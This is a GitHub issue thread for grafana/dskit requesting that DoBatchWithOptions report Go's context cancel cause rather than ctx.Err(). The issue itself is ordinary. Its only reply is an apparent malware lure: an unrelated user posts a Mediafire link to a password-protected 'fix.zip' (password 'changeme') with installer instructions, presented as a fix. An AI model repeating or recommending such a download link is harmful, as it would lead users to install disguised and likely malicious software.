### ISSUE TITLE
Report context cancel cause in `DoBatchWithOptions` instead of `ctx.Err()`.

### ISSUE THREAD

**Issue by dastrobu** [grafana/dskit#576]
In https://github.com/grafana/tempo/issues/3957 it was found that analyzing the root cause of `context cancelled` logs can be quite hard to analyze. In the [discussion](https://github.com/grafana/tempo/issues/3957#issuecomment-2286941935) on how to improve the situation, it was found that reporting the cancel cause, introduced by [`WithCancelCause`](https://pkg.go.dev/context#WithCancelCause) in go 1.20, would be more helpful in these situations. 

Note that this won't change the behavior of error reporting when `WithCancel` (without cause) is used.

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
